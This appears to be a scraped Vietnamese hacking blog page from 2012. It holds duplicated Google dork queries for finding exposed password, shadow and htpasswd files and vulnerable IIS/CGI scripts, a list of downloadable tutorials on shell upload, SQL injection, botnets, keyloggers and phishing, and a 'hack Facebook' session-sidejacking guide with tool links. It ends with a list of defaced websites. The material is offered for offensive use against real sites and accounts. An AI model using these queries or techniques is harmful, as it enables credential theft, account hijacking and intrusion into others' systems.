imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
inurl:/adpassword.txt
inurl:admin.dat
and even for shop sites:
inurl:/shop/db/
intitle:"index of/ shop" +db
intitle:"index of/" +shopping_cart
allinurl: "proxylist.txt"
allinurl: "proxy.txt"
"index of/root"
"auth_user_file.txt"
"index of/root"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype oc
allintitle: restricted filetype :mail
allintitle: restricted filetype oc site:gov
for IIS server exlpoit
allinurl: winnt/system32/
and u ll get many IIS server exploits
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
inurl:/adpassword.txt
inurl:admin.dat
and even for shop sites:
inurl:/shop/db/
intitle:"index of/ shop" +db
intitle:"index of/" +shopping_cart
ALL VIDEO TUT HACKING
Attack webserver.rarDownload: http://www.mediafire.com/?obqcq1tqomskc
Back connect.rar
Basic Hacking with windown.rar
blind sql injection.rar
Botnet2.rar
Botnet.rar
Bug File Manager.rar
Bug mysqldumper.rar
Bug update vbb3.5.rar
Bypass safemode off.rar
bypas_safemode(php5.2.9).rar
Demo hack wifi wep.rar
Download hack.rar
Flood shoutbox.rar
Flood(xtremedia).rar
Get admin via Bug site xteamedia 1.2.rar
Get root & Remote desktop.rar
Get root.rar
Hack modem.rar
Hack server remote destop.rar
Hack user default.rar
Hack via RFI.rar
Hack Yahoo mail.rar
Hacking & reseller.rar
How i get free host.rar
How to use milw0rm.rar
how to write a bot.rar
huong dan su dung keylog.rar
huong dan su dung spynet.rar
Inc shell (via sql injection).rar
Inc shell via sql querry.rar
Inc shell(database).rar
Inc shell(function).rar
Inc shell(joomla new method).rar
Inc shell(joomla).rar
Inc+shell(phpmyadmin).rar
KVIrc 3.4.2 remote command execution exploit.rar
Local attack(FTPtelecom).rar
Local attack(sinhvienHUI).rar
Local basic2.rar
Local basic.rar
Local via netcat.rar
Local via sql.rar
Local via symlink 2.rar
Local via symlink.rar
Localhack full tut.rar
Metasploit windows.rar
Permission guest.rar
phpbb.rar
remote via lan by metasploit.rar
Remote via vnc.rar
RFI.rar
Sniff pass yahoo and gmail.rar
Sql injection(bwc).rar
Sql injection(hitech).rar
Sql injection(namavina).rar
Sql injection(RGP infeno bug).rar
Sql injection(tieuchivang).rar
Sql injection(tieuchivang).rar
Sql injection(trexanhvn).rar
TestSQL2.rar
TestSQL3.rar
TestSQL.rar
Trom acc rs.rar
up shell cac loai forum.rar
Upload shell(4images).rar
Upload shell(bug extension)_2.rar
Upload shell(bug extension).rar
Upload shell(bug upload).rar
Upload shell(ezupload).rar
uploadhack2.rar
uploadhack.rar
Use netscan hack computer online.rar
Use shell R57.rar
Web phishing attack.rar
Yahoo sniff.rar
Chủ Nhật, 11 tháng 11, 2012
TUT hack Facebook Update
“Hack facebook” . TUT tiếc cho bằng anh bằng em
Đầu tiên : Khái niệm (Trên lớp thầy cũng dạy phải học khái niệm trước . Biết thì mới thực hành được .)Session Sidejacking là gì ?
Đây là kiểu tấn công thuộc họ man-in-middle attack, mục đích là nghe lén đường truyền giữa người dùng và các máy chủ dịch vụ bằng các công cụ sniff rồi đánh cắp các dữ liệu quan trọng liên quan tới phiên làm việc của người dùng, rồi phục dựng phiên làm việc này trên một máy tính thứ 3.
Session Sidejacking đặc biệt hữu hiệu và dễ thực hiện khi nhằm vào mục tiêu là các phiên truy cập trên môi trường web. Hướng tấn công này trong môi trường web và giao thức HTTP chủ yếu là nhằm vào việc đánh cắp session cookies -1- định danh người dùng, qua đó khôi phục phiên làm việc hiện thời của người dùng rồi sau đó người tấn công sẽ có các biện pháp tấn công sâu rộng hơn để chiếm được mật khẩu tài khoản của người dùng
Nói ngắn gọn dễ hiểu, ở một mức độ nào đó, là người tấn công sẽ dễ dàng chiếm tài khoản Facebook, gmail, yahoo của người dùng bằng HTTP Session Sidejacking
Bài viết này chủ yếu nói về cách thức tấn công HTTP Session Sidejacking . Tức hình thức tấn công Session Sidejacking nhắm vào việc đánh cắp session cookies và phục dựng là HTTP Session.
Đặc biệt: Phương thức tấn công Session Sidejacking trong bài viết này không cần phải có card mạng hỗ trợ chế độ Promiscuous ( chế độ hỗn độn ) -2- . Đây là một bước tiến bộ so với các công cụ tấn công tự động như Firesheep, hamster & ferret, khiến việc tấn công session Sidejacking trở nên dễ dàng thực hiện đối với tất cả các card mạng hiện có. Nói cách khác, ai cũng làm được
Phần 2 : thực hành
clip 1 :http://youtu.be/Ot2JGkOxkSU
clip 2 :http://youtu.be/ZiBvNIbzfVY
clip 3 :http://youtu.be/ZiBvNIbzfVY
Hướng dẫn này không nhằm mục đích phá hoại . Mà chỉ mang tính chất tham khảo + câu view (title HOT)
Thấy dạo này trẻ trâ u manh động quá . Nói mà chả thấy làm nên cũng tut tiếc cho máu lửa xíu .
Xem xong video các bạn có nhìn thấy được cách phòng chống không ?
Mình muốn hỏi để xem các bạn rút ra dc kinh nghiệm gì khi xem video này
Link add-on : https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/
Link Script : http://www.mediafire.com/?9v6cift39ixn5c9
Link wireshark : http://www.mediafire.com/?729jc658ccm1jx9
link Cain & abel : http://www.mediafire.com/?c87vw9n3mz8nmra
link hướng dẫn txt :http://www.mediafire.com/view/?kb68j9syxbir7w9
Nguồn BYG
Thứ Bảy, 10 tháng 11, 2012
Hàng loạt site Tàu Khựa Bị KunGa tấn công
http://www.cnjinqun.com/kunga.html
http://dofuskamas998.com/kungafuckcn.html
http://fcwood-machinery.com/kungafuckcn.html
http://formingmachine123.com/kungafuckcn.html
http://fortunecitychina.com/kungafuckcn.html
UPDATE
http://google-hz.cn/kungafuckcn.html
http://honest-diamond.com/kungafuckcn.html
http://hz51seo.cn/kungafuckcn.html
http://hzbtly.com/kungafuckcn.html
http://www.zkjdme.cn/kungafuckcn.html
http://zjlison.com/kungafuckcn.html
http://dofuskamas998.com/kungafuckcn.html
http://fcwood-machinery.com/kungafuckcn.html
http://formingmachine123.com/kungafuckcn.html
http://fortunecitychina.com/kungafuckcn.html
UPDATE
http://google-hz.cn/kungafuckcn.html
http://honest-diamond.com/kungafuckcn.html
http://hz51seo.cn/kungafuckcn.html
http://hzbtly.com/kungafuckcn.html
http://www.zkjdme.cn/kungafuckcn.html
http://zjlison.com/kungafuckcn.html
Đăng ký:
Bài đăng (Atom)